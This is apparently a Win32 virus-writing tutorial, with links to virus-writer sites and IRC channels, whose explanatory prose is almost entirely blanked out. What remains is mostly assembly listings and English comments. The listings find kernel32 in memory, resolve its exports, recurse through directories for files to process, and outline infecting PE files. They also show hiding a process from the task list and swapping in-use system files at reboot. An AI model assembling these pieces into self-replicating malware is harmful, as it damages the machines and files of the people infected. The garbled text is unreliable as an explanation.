
                                Win32
                              ================

                                 1.03

      ,      
   DOS,          
  .

  [1]  
  [2]   ?
  [3]   
  [4] 
  [5]    win32 -- 
  [6] PE-
  [7]   
  [8]   
  [9]  PE-
  [10]  
  [11]  (ring-3)

  [1]  
  ~~~~~~~~~~~~~~~~~~~

  ,      win32,    .

    ,  ,      
  ,     /  C/C++.

  H,  --  ,  ,   C++ 
  -     --   ,
        - --   -  .

          ,
      .

  ,     32-  --
  ,   EAX'  AX'.
     16-   32- -- H ,
            win32.

  H ,      ,
    :

        - Windows 95/98/NT/2000 ( Win98)
        - 32-  TASM 5.0
             :
              tasm32.exe, tlink32.exe, import32.lib, *.inc

        -  Soft-ICE  Windows ( Soft-Ice 4.00)
               , ,   , 
            1.   / 
            2.   
            3.  
        -      
            H ,     
              - .
               Dos Navigator,   Far+MultiEdit.
        - ,   
            HIEW
            IDA Pro
        - _H_ (  ):
            TurboDebugger, Norton/Volkov Commander, HyperTerminal, etc.

   ,   , :

        - WIN32.HLP --  ;
              12 MB,    Borland C++,
                ,    SDK
            :
                 C-,
               PUSH-  H .
             2:
                  
             Borland Delphi.

        - DDPR.HLP --   win9X ring-0/VxD
              DDK

        -    SDK  DDK
               ,    ,
                

        -       "  PE" by Hardwisdom,
              .

  [2]   ?
  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    
    ~~~~~
             Win32  
     ,        
  :
         "    Windows95"
         "H Windows 95" (2-e )

     
     ~~~~
      http://protools.cjb.net

     
     ~~~~~~~~
      :

     http://z0mbie.host.sk -  Z0MBiE,   
     http://topd.tsx.org - -  Top Device, ,  
                             .
     http://smf.chat.ru -   SMF
     http://myallstar.cjb.net -   Misdirected Youth
     http://vx.netlux.org -   , , .

     :

     http://www.coderz.net -   
     http://virus.cyberspace.sk -   Asterix'a.

     IRC:
     ~~~~
     Undernet:

       #virus - ,       
       #smf   - 

        EFnet:

       #sgww  - 

      ,         ,
             
       .   :)

  [3]   
  ~~~~~~~~~~~~~~~~~~~~~~~~~~

    ,     
    ,    .

  :
  1.  -   win32-  
        in-the-wild  ( )
  2. ,   
  3.    
  4.      ( )
  5.     

  H  ,    ,
          .

   -    ,      
    ,   -  .

         :

  1.     --   
  2.     (   )
     --   ;    --
             .EXE
        (/   PE00)  - ,
              -
  3.     --   
     --   :
            1.     
            2.       MBR', ,
                  MBR'    ,
                 "" MBR'   "" 
            3. H     MBR'  
            4.   ""     
                 MBR', , -,
                    
            5.       
                   
            6. H .BAT-,  () 
                     
               ( , ,  ..)
            7.  ,    , 
                MBR
     --      :
            1.  BAT    5      
                
            2.   ""    
            3.  ,  "" MBR  
            4. 
            5. /   "" 
            6.   MBR  ( )
            7.   "" 
     --        
           5-10 ;    .
        ,      "" ,  
               ;
             "" .
  4.        --
     --        ,  
          ,          
           (  , )


  [4] 
  ~~~~~~~~~~~~~

   ,   --  Soft-Ice.

    Soft-Ice      ,
            
  ,    .     
    ,   -  .
  ( Trident 8900,      Standard Trident SVGA,
       Trident 9440).
       ,    ,
     100%   VESA,    
   Soft-Ice     ,    .

      ,       
      Soft-Ice  .   5103-00009B-9B
        Soft-Ice 4.03-4.05

     ,  Soft-Ice     
   ,      .

        Soft-Ice  ,
            3- ,
      winice.dat   INIT=  i3here on;
          int 3 
    Soft-Ice,      .

          ,     DEBUG.EXE,
      .
   H      .

            h ( help),
      ?  DEBUG.EXE  --   .


  [5]    win32 -- 
  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     ,   ;
       ,       .
     -  (386,486,586),
       .   .

  , win32 --  ,      
  ().        32-
  __.

  32- ,      2^32 ,  4 .
    __   
   4-   () ,
  ""    ""  ( 4- ),
   0  0xFFFFF000.
   ,   " " -- "" ( ),
   /  .

  .,                    ,
    16 MB             4 

  4k> 4k  , (== . )
                          
  4k                ::::::  
                       > 4k
  4k                         , (== )
                         ::::::
  ::::::                       ::::::   (== )
                    ::::::
  (),  MB             4k  ,     
  4k  
                          ::::::
  ::::::                        ::::::

   4-   4-   
  H (allocate),      
     ,     .
     H (free, deallocate),    
   ,    "",  
   H   .
      H (commit, lock),   
  "", ..  -    .
      H (decommit, unlock),
      ,      
       (swap-file).

         ,  
     .
       (swapping) 
  , "",       ,
         --     .

  ,     () -- 
  __  ,
      ,
    __  .

        
  ( __),
           H.
   ,       .
       /  ,
  ,  (heap), /  , 
    (DLL)   .

      ,     - .
   --     4k.   --  ,
   __.

    ,    
           .

      :

  
  0x00000000   -- DOS V86-,
              win9X   /.
  0x00200000   --  ,     .
  0x00400000 2044   ,    
                DLL-, , ,    .
  0x80000000 2  --  ,   ,
              win9X --   VxD-  kernel

    .

    ,       
   .
   win32    : ring-3 ()  ring-0 ().
  H  ring-0       
   --   ()      .
     ring-3   :
  1.      (read-write)
  2.     (read-only)
  3.  (       )
  4.     (executable),
       guard, writecopy      --
            .
       (0/3)      CS.

    ,        read-only,
        ,      .
        kernel'    PE-.
    PE-      ObjectEntry
       ,
    -  VirtualProtect/WriteProcessMemory;
    kernel'    
  ( )    .


  [6] PE-
  ~~~~~~~~~~~~

  PE (Portable Executable) --   ,
       win32 EXE  DLL .
         .

   ,  PE EXE/DLL      ,
   KERNEL32.DLL   .

  KERNEL32.DLL     ()  PE 
   ,      win32 api.

   PE   ()  KERNEL'   DLL- 
  ,      .

    KERNEL32.DLL        ( 2- ),
        .

     :
    PE     / 
  (      ),      :
  :  , MAZAFUK.EXE,   KERNEL32.DLL  DeleteFile.
  : , KERNEL32.DLL,   DeleteFile.

      MAZAFUK.EXE    
     KERNEL32.DLL     DLL-,
          
      MAZAFUK.EXE .
     ,     CALL'
    .

     PE-EXE ,
     /   ,
     (tlink32.exe).
     :

  extern DeleteFileA:PROC        ; import: the symbol is left unresolved and the linker (tlink32 + import32.lib)
                                 ; turns the reference into an entry in the PE import table
  call   DeleteFileA             ; the call goes through the import thunk the loader fills in at load time

  public  mazafuk                ; export: make the label visible to the linker so it can appear in the export table
  mazafuk: ...

  ,        ,  
        
    ,     ;
          .


   PE-  . (    )

       :
  MZ-
  PE-
    (== )
   ( )

    --    ,    , ,
  ,   .

  H ,    , , dos'
  COM ,  PE         .
  ,    dos' EXE-,   
     .
    ,         ,
      ,  
  _______ (RVA)
   
  _______.
          .

  ,   PE ,     
    (rva),    .
         
    .

   PE-   ImageBase.
     64k (   ),  ,   
         .
  MZ-, PE-       
  ,   .
   -- .     ,
         ,
      .
            ,
       
      "" ,
    ,       
      : DB 1000 dup (?)

    ,    PE    
      ,    .


  [7]   
  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    ,     H   .
   :  ,     
  (   )    KERNEL32.DLL,
         .

      :
  1.    KERNEL32.DLL, 
  2.    

   kernel'    (win9x)  BFF70000.
   winNT   , ,  ,
       .
      ,      
     NT'.

      PE    ,  
      .    
  KERNEL32.DLL,        
   kernel'.
    ,    ,     
  .  , winNT.
  ,       
   -   DLL-,     64k  
    MZ.      ,  kernel  .
    ,    ,     
  -  . (   ).
    -      
        kernel,    
        .
        :

  1.       GetModuleHandleA, 
     (.. )   .
      :
       ,          
     ,   "".
           GetProcAddress,     
                  
   . H  ,     , 
   ,  ,    GetModuleHandleA.

.386p
.model flat
extrn GetModuleHandleA:proc
.data
imagebase       dd 00400000h            ; assumed load address of this image (default EXE ImageBase);
                                        ; never verified at run time -- a relocated image breaks every RVA below
Modulename      db 'KERNEL32.DLL',0
gmh             db 'GetModuleHandleA',0 ; exactly 16 characters; compared below without the terminator
.code
start:
       int 3                   ; debugger breakpoint (Soft-ICE needs "i3here on"); remove for a non-debug build

       mov edx,[imagebase]     ; EDX = image base; every RVA below is made absolute by adding it

       mov  eax,[edx+3ch]      ; e_lfanew: offset of the PE header from the MZ header
       add  eax,edx            ; EAX = VA of the 'PE\0\0' signature

       mov ebx,[eax+80h]       ; EBX = RVA of the import directory (data directory entry 1, PE32 layout)
       add ebx,edx             ; EBX = VA of the first IMAGE_IMPORT_DESCRIPTOR

next_module:

       mov ecx,[ebx+0ch]       ; descriptor+0Ch: RVA of the imported DLL's name
                               ; (zero marks the end of the descriptor array)

       cmp 4 ptr ecx,0         ; no more descriptors -> kernel32 is not imported at all
                               ; NOTE(review): "4 ptr" is a non-standard size spelling -- confirm the
                               ; assembler accepts it, otherwise write "dword ptr" (or drop the override)
       jz  no_kern_imp
       add ecx,edx

       cmp 4 ptr [ecx],'NREK'  ; dword compare of the first 4 name bytes with "KERN"
                               ; ('NREK' is stored so that memory reads K,E,R,N); the compare is
                               ; case-sensitive, a lowercase "kernel32.dll" entry is NOT matched
       jne next
       cmp 4 ptr [ecx+4],'23LE' ; ... and the next 4 bytes with "EL32"
       je kern_imp

next:
       add ebx,14h             ; sizeof(IMAGE_IMPORT_DESCRIPTOR) = 20 -> next descriptor
       jmp next_module

kern_imp:

       mov eax,[ebx]           ; descriptor+0: RVA of the import name table (OriginalFirstThunk)
                               ; NOTE(review): not checked for 0 -- confirm the target images always carry it
       add eax,edx
       xor ecx,ecx             ; ECX = byte offset into the IAT, advanced in step with EAX

api_imp:

       mov esi,[eax]           ; thunk: RVA of IMAGE_IMPORT_BY_NAME (2-byte hint + ASCIIZ name)
       cmp 4 ptr esi,0         ; zero thunk = end of this DLL's import list -> name not imported
       jz  no_kern_imp

       add esi,2               ; skip the hint word so ESI points at the name string
                               ; (a thunk with bit 31 set is an import by ordinal, not a name -- not handled here)
       add esi,edx

       mov edi,offset gmh
       push ecx
       mov ecx,16
       repe cmpsb              ; compare 16 bytes with "GetModuleHandleA"; ZF=1 on a full match
       pop  ecx                ; pop does not touch flags, so ZF survives
       jz  f_gmh

       add ecx,4               ; next IAT slot ...
       add eax,4               ; ... and next name-table thunk
       jmp api_imp             ; keep scanning

f_gmh:
       mov eax,[ebx+10h]       ; descriptor+10h: RVA of the IAT (FirstThunk)
       add eax,edx
       add eax,ecx             ; EAX = VA of the IAT slot that the loader filled with
                               ; the address of GetModuleHandleA
       mov eax,[eax]           ; EAX = address of GetModuleHandleA

       mov  ecx,offset Modulename
       push ecx                ; lpModuleName = "KERNEL32.DLL"
       call eax                ; GetModuleHandleA(lpModuleName); stdcall, the callee pops the argument
                               ; RETURN: EAX = HMODULE (= load address) of kernel32.dll

no_kern_imp:

       nop
end start

   2.    -     
         ,   
   ,         .

.386p
.model flat
extrn GetModuleHandleA:proc             ; not used by this variant (kept from the first listing)
.data
imagebase       dd 00400000h            ; assumed load address of this image; not verified at run time
Modulename      db 'KERNEL32.DLL',0     ; unused in this variant
gmh             db 'GetModuleHandleA',0 ; unused in this variant
.code
start:
       int 3h                  ; debugger breakpoint (3h == 3); remove for a non-debug build

       mov edx,[imagebase]     ; EDX = image base; RVAs below are made absolute by adding it

       mov  eax,[edx+3ch]      ; e_lfanew: offset of the PE header from the MZ header
       add  eax,edx            ; EAX = VA of the 'PE\0\0' signature

       mov ebx,[eax+80h]       ; EBX = RVA of the import directory (data directory entry 1, PE32 layout)
       add ebx,edx             ; EBX = VA of the first IMAGE_IMPORT_DESCRIPTOR

next_module:

       mov ecx,[ebx+0ch]       ; descriptor+0Ch: RVA of the imported DLL's name
                               ; (zero marks the end of the descriptor array)

       cmp 4 ptr ecx,0         ; no more descriptors -> kernel32 is not imported
                               ; NOTE(review): "4 ptr" is a non-standard size spelling; "dword ptr" is the usual form
       jz  no_kern_imp
       add ecx,edx

       cmp 4 ptr [ecx],'NREK'  ; dword compare of the first 4 name bytes with "KERN"
                               ; (case-sensitive; a lowercase entry is not matched)
       jne next
       cmp 4 ptr [ecx+4],'23LE' ; ... and the next 4 bytes with "EL32"
       je kern_imp

next:
       add ebx,14h             ; sizeof(IMAGE_IMPORT_DESCRIPTOR) = 20 -> next descriptor
       jmp next_module

kern_imp:

       mov eax,[ebx+10h]           ; descriptor+10h: RVA of the IAT (FirstThunk)
                                   ; of the kernel32 descriptor
       add eax,edx

       mov eax,[eax]               ; EAX = value the loader stored in the first IAT slot, i.e. an
                                   ; address inside kernel32 (assumes a real function address, not a stub)
       xor ax,ax                   ; clear the low 16 bits: round down to a 64k boundary for the
                                   ; downward scan (16-bit partial write; the upper half of EAX is kept)
       ...

      PE-      ?

  
  1.   PE    64k,
  2.          
        
  3.      MZ-
     :

  1.      
  2.   64k
  3.    H  'MZ',     64k   3

   ...
f_kern32:
                                       ; EDX = candidate address, 64k aligned; scan downward for the MZ/PE header
       cmp 2 ptr [edx],'ZM'            ; word compare: memory bytes "MZ"
       je  check_pe
       cmp 2 ptr [edx],'MZ'            ; also accept the other byte order (memory "ZM")
       jne next_seg

check_pe:

       cmp 1 ptr [edx+18h],40h        ; e_lfarlc == 40h: header of a new-style executable
       jne next_seg

       mov esi,[edx+3ch]              ; e_lfanew
       add esi,edx

       cmp 4 ptr [esi],'EP'            ; dword compare with "PE\0\0" ('EP' == 00004550h)
       jne next_seg
       jmp kern32

next_seg:

       sub edx,10000h                  ; step down one 64k granule and retry
       jmp f_kern32                    ; NOTE: no lower bound and no check that the page is mapped --
                                       ; a read from an unmapped page faults, and this listing installs
                                       ; no exception handler to survive it

kern32:
no_kern_imp:

       nop

end start


    kernel' ?

      , ,  ,
    :

   1, :

    PE ,   ,   ,
  ,   kernel',       
    .

   2,  :

     :

; subroutine: get_proc_address
; action:  look up an export of kernel32 by name (linear scan of the export name table)
; input:  EDI=ASCIIZ name of the kernel32 export to find (e.g. 'CreateProcessA')
; output: ZF=1, EAX=0 (function not found)
;         ZF=0, EAX=function va
; clobbers: flags only; all general registers are restored by popa, EAX via the saved frame
; assumes: kernel32 is mapped at 0BFF70000h (the win9x value quoted in the text) --
;          wrong on the NT family or wherever the DLL is relocated

get_proc_address:       pusha

                        mov     ebx, 0BFF70000h         ; EBX = kernel32 base (hard-coded, win9x only)

                        mov     ecx, [ebx+3Ch]          ; e_lfanew
                        mov     ecx, [ecx+ebx+78h]      ; export directory RVA (data directory entry 0)
                        jecxz   __return_0              ; no export table -> not found
                        add     ecx, ebx                ; ECX = VA of IMAGE_EXPORT_DIRECTORY

                        xor     esi, esi        ; ESI = current name index
__search_cycle:         lea     edx, [esi*4+ebx]
                        add     edx, [ecx+20h]  ; + AddressOfNames RVA
                        mov     edx, [edx]      ; RVA of the name string
                        add     edx, ebx        ; EDX = VA of the name string

                        push    edi             ; the compare loop advances EDI; restore it afterwards
__cmp_cycle:            mov     al, [edx]
                        cmp     al, [edi]
                        jne     __cmp_done      ; mismatch: leaves ZF=0
                        or      al, al
                        jz      __cmp_done      ; both strings ended together: leaves ZF=1 (full match)
                        inc     edi
                        inc     edx
                        jmp     __cmp_cycle
__cmp_done:             pop     edi             ; pop does not touch flags

                        je      __name_found

                        inc     esi             ; index++
                        cmp     esi, [ecx+18h]  ; NumberOfNames
                        jb      __search_cycle  ; NOTE: the count is checked only after name[0] has
                                                ; already been read, so a table with NumberOfNames == 0
                                                ; still dereferences its first name pointer

__return_0:             xor     eax, eax        ; EAX=0 and ZF=1 -> "not found"
                        jmp     __return

__name_found:           mov     edx, [ecx+24h]  ; AddressOfNameOrdinals RVA
                        add     edx, ebx        ; +imagebase
                        movzx   edx, word ptr [edx+esi*2]; EDX = ordinal (index into the address table)
                        mov     eax, [ecx+1Ch]  ; AddressOfFunctions RVA
                        add     eax, ebx        ; +imagebase
                        mov     eax, [eax+edx*4]; EAX = RVA of the function
                        add     eax, ebx        ; EAX = VA; result is non-zero so ZF=0 here
                                                ; NOTE: a forwarded export (RVA pointing back into the
                                                ; export directory) is returned as-is, not resolved

__return:               mov     [esp+7*4], eax  ; patch the EAX slot saved by pusha
                                                ; (push order EAX,ECX,EDX,EBX,ESP,EBP,ESI,EDI -> EAX at +28)

                        popa                    ; popa leaves flags alone, so ZF reaches the caller
                        retn

     :

  1.      ,  --   kernel 
    --  kernel   dll',   ;
         .
   ' ' , ,    
      EXTERN,       RET'.
  ( ,     DLL-)

  2.  ,     ,   
       (   ),
     -A   -W.
   -A (ascii) ,    ASCII ,
       ,     0.
   -W (wide) ,     ,
       ,     ,
         .
    (-A/-W) ,     ,   
    ;  ,     ,  
        .
  ,      -Ex,     Ex, ExA  ExW.
   ,  -Ex     .
         ( Ex)
  ,   (EXtended)  ,   
     .  ,  ""  
     -Ex - .
   ,    .
     ,      
   CreateFile,        kernel' H.
       : CreateFileA  CreateFileW.
      C- ,   , 
      ,   A  W .

  ,      
  ____  - ,
   (  kernel32.dll)   
     .

  [8]   
  ~~~~~~~~~~~~~~~~~~~~

  H    ,   
     .
  (,  ,  , /, )
    ,   .

     ?
  H   ,     . H ,   ,
    ,    PUSH-   .
         :

  ; subroutine: fopen_rw
  ; action: open file for read-write access
  ; input:  EDX=file name (ASCIIZ)
  ; output: CF=0 -- EAX=handle
  ;         CF=1 -- error
  ; clobbers: flags only; every other register is restored by popa
  ; (the FILE_* / OPEN_EXISTING / GENERIC_* names come from the win32 include files)

  fopen_rw:             pusha
                        push    0                       ; hTemplateFile
                        push    FILE_ATTRIBUTE_NORMAL   ; dwFlagsAndAttributes
                        push    OPEN_EXISTING           ; dwCreationDisposition: existing files only, never creates
                        push    0                       ; lpSecurityAttributes
                        push    FILE_SHARE_READ + FILE_SHARE_WRITE  ; dwShareMode
                        push    GENERIC_READ + GENERIC_WRITE        ; dwDesiredAccess
                        push    edx                     ; lpFileName
                        call    CreateFileA             ; stdcall: the callee removes the 7 arguments
                        cmp     eax, -1                 ; INVALID_HANDLE_VALUE?
                        je      error
                        clc                             ; CF=0: success (popa keeps flags)
                        mov     [esp+7*4], eax          ; popa.eax: patch the saved EAX slot with the handle
                        popa
                        retn
  error:                  stc                           ; CF=1: failure
                                                        ; NOTE(review): "error" is a file-global label; do not reuse the name elsewhere
                        popa
                        retn

           maplib4.zip

    . H       .
          , PUSH-
   ,         30.
           
    .
   ,   "" (..  )
    lopen, lread  ..

      :

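  ; read a whole file into a GlobalAlloc'ed buffer:
  ;   FileName -> bufptr (buffer), bufsize (length), bytesread (actual count)
  ; every API result is checked; on any failure the handle (and the buffer, if
  ; already allocated) is released before jumping to __failed, so nothing leaks
  push    0                       ; hTemplateFile
  push    80h                     ; FILE_ATTRIBUTE_NORMAL
  push    3                       ; 3=OPEN_EXISTING  2=CREATE_ALWAYS
  push    0                       ; lpSecurityAttributes
  push    1+2                     ; 1=FILE_SHARE_READ 2=FILE_SHARE_WRITE
  push    080000000h+40000000h    ; GENERIC_READ + GENERIC_WRITE
  push    offset FileName
  call    CreateFileA
  cmp     eax, -1                 ; INVALID_HANDLE_VALUE
  je      __failed
  xchg    ebx, eax                ; EBX = file handle

  push    0                       ; lpFileSizeHigh = NULL: only the low 32 bits are used
  push    ebx                     ; handle
  call    GetFileSize
  cmp     eax, -1                 ; INVALID_FILE_SIZE: the query failed (a file >= 4 GB is
                                  ; indistinguishable here because the high dword is not requested)
  je      __close_failed
  mov     bufsize, eax

  push    eax                     ; size
  push    0                       ; 0=GMEM_FIXED
  call    GlobalAlloc
  test    eax, eax                ; NULL = allocation failed
  jz      __close_failed
  mov     bufptr, eax

  push    0                       ; lpOverlapped
  push    offset bytesread        ; bytesread
  push    bufsize                 ; size
  push    bufptr                  ; buf
  push    ebx                     ; handle
  call    ReadFile
  test    eax, eax                ; FALSE = read failed
  jz      __free_failed
  mov     eax, bytesread
  cmp     eax, bufsize            ; short read: the buffer does not hold the whole file
  jne     __free_failed

  push    ebx                     ; handle
  call    CloseHandle
  jmp     __done

  __free_failed:
  push    bufptr                  ; release the buffer so the error path does not leak it
  call    GlobalFree
  __close_failed:
  push    ebx                     ; handle
  call    CloseHandle
  jmp     __failed
  __done: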

  [9]  PE-
  ~~~~~~~~~~~~~~~~~~~~~~~

   ,        
    ,     - .
      INT 3,    
     .

  H      PE  
      .
    :

  *       :
         ,    ;
         -   
  *      ;
  *      ;
     
     ____  __;
       VirusEntryPoint-VirusStart    
     RVA   ( PE-)
  *  ____   
  *       
    FileAlignment  ObjectAlignment,   PE-
  *     --     
  *     --     
  *  SizeOfImage  PE- --  
    ____ +
    ___

    .
    ,     ,
      ,  DLL-        ,
       --  .
      ,     imagebase --  .

  H     
  1.   
  2.  
   :
  3.     
  4.     
  5.       

         DLL-;
    imagebase     () .

        
   JMP ( 0xE9).
   ,    PUSH <address>/RETN,  ,
  ..       imagebase.

     ,     DLL'.
         :

  mov eax, 1                    ; DLL entry point returns TRUE (EAX=1)
  retn 0Ch                      ; stdcall epilogue: pop the three dword arguments of the DLL entry point

       ,    ,
     mov eax,1    .

  [10]  
  ~~~~~~~~~~~~~~~~~

        .
   ,    .
     FindFirstFileA / FindNextFileA / FindClose.
           
   ,   win32- .

           :

ff_struc                struc                   ; win32 "searchrec" structure (layout of WIN32_FIND_DATAA, 318 bytes)
ff_attr                 dd      ?               ; dwFileAttributes (bit 10h = directory, tested by process_directory)
ff_time_create          dd      ?,?             ; ftCreationTime (FILETIME, two dwords)
ff_time_lastaccess      dd      ?,?             ; ftLastAccessTime
ff_time_lastwrite       dd      ?,?             ; ftLastWriteTime
ff_size_hi              dd      ?               ; nFileSizeHigh
ff_size                 dd      ?               ; nFileSizeLow
                        dd      ?,?             ; dwReserved0, dwReserved1
ff_fullname             db      260 dup (?)     ; cFileName: ASCIIZ entry name, MAX_PATH bytes
                                                ; (just the name, not a full path, despite the field name)
ff_shortname            db      14 dup (?)      ; cAlternateFileName: 8.3 alias
                        ends

; subroutine: process_directory
; action:     1. find all files in the current directory
;             2. for each found directory (except "."/"..") recursive call;
;                for each found file call process_file
; input:      EDI=ff_struc
;             EDX=directory name
; output:     none
; notes:      - all registers are preserved (pusha/popa); each recursion level takes
;               1024 bytes of stack for its path buffer, so deep trees cost stack
;             - the buffer is not bounds-checked: directory name + '\' + found name
;               (up to 260 bytes) must fit in 1024 bytes
;             - any directory whose name begins with '.' is skipped, not only "." and ".."
;             - the one ff_struc is shared with the recursive calls and refilled by FindNextFileA

process_directory:      pusha
                        sub     esp, 1024       ; path buffer on the stack

                        mov     esi, edx        ; copy the directory name (ASCIIZ) ...
                        mov     edi, esp        ; ... into the buffer

__1:                    lodsb
                        stosb
                        or      al, al
                        jnz     __1

                        dec     edi             ; back up over the terminator; append '\' unless already present
                        mov     al, '\'
                        cmp     [edi-1], al
                        je      __3
                        stosb
__3:
                        mov     ebx, edi        ; EBX = position right after the trailing '\' (entry names go here)

                        mov     eax, '*.*'      ; append "*.*",0 (the dword stores as 2Ah 2Eh 2Ah 00h)
                        stosd

                        mov     edi, [esp+1024] ; restore EDI = ff_struc from the pusha frame (EDI is pushed last, so it sits just above the buffer)

                        mov     eax, esp
                        push    edi             ; lpFindFileData = ff_struc
                        push    eax             ; lpFileName = "<dir>\*.*"
                        call    FindFirstFileA

                        xchg    esi, eax        ; ESI = search handle

                        cmp     esi, -1         ; INVALID_HANDLE_VALUE: nothing found or error
                        je      __quit

__cycle:                pusha                   ; copy the found name after the '\' (overwrites "*.*" / the previous name)
                        lea     esi, [edi].ff_fullname
                        mov     edi, ebx
__strcpy:               lodsb
                        stosb
                        or      al, al
                        jnz     __strcpy
                        popa

                        mov     edx, esp        ; EDX = full path of the found entry

                        test    byte ptr [edi].ff_attr, 16  ; FILE_ATTRIBUTE_DIRECTORY?
                        jnz     __dir

                        call    process_file    ; regular file: process_file(EDX=path, EDI=ff_struc)

                        jmp     __next

__dir:                  lea     eax, [edi].ff_fullname
                        cmp     byte ptr [eax], '.'    ; skip ./../etc. (and every other name starting with '.')
                        je      __next

                        call    process_directory       ; recurse with EDX=subdirectory path, EDI=ff_struc

__next:                 push    edi             ; lpFindFileData = ff_struc
                        push    esi             ; search handle
                        call    FindNextFileA

                        or      eax, eax        ; FALSE = no more entries
                        jnz     __cycle

                        push    esi             ; close the search handle
                        call    FindClose

__quit:                 add     esp, 1024
                        popa
                        retn

; subroutine: process_file (stub -- the per-file work goes where the "..." is)
; input: EDX=full filename
;        EDI=ff_struc
; output: none; all registers are preserved by pusha/popa

process_file:           pusha

;                       ...

                        popa
                        retn


  [11]  (ring-3)
  ~~~~~~~~~~~~~~~~~~~~~~~~~~~

  ,    DOS' TSR-,  win32 .
     ,   .
      ,    ,   ,
  ,      .

  H     "":
        (GetWindowsDirectoryA, CopyFileA)
    DROPPER.EXE,       
     .

     ,  :   
   -    .
      ,
       .

        ctrl-alt-del?
     ;
   winNT    RegisterServiceProcess ,
   ,     .

                        push    1               ; dwType = 1: register
                        push    0               ; dwProcessId = 0: the calling process
                        call    RegisterServiceProcess  ; see the paragraph above for win9x vs winNT availability

    //   
  Process32First/Next, Module32First/Next, Thread32First/Next.
        ,     .

  ,     ,    win32 
  /  ,  ,  .
       ,  win9X   winNT.
     %windir%\wininit.ini  2 :
  [rename]
  dstfile=srcfile
      ,   ,    
      ,    .
        
  WritePrivateProfileStringA.
    ring-0     .
   winNT   - MoveFileExA  
  DELAY_UNTIL_REBOOT,          
  .
  ,  , MoveFileExA   ,   
    ,   ,    winNT 4   win2000 
   explorer.exe   .
  ,  NT 3/4       ,
      ;   win2000    SFC.
       SETUPAPI.DLL::SetupInstallFileA,  
  __  movefileex'.

  H.
  H (thread) --  ,     
  .    --   .
      ()    
    ( )        .
       ,     .
          -- .
    ,    ,  CreateThread.
       CreateThread    
       .


                                   * * *
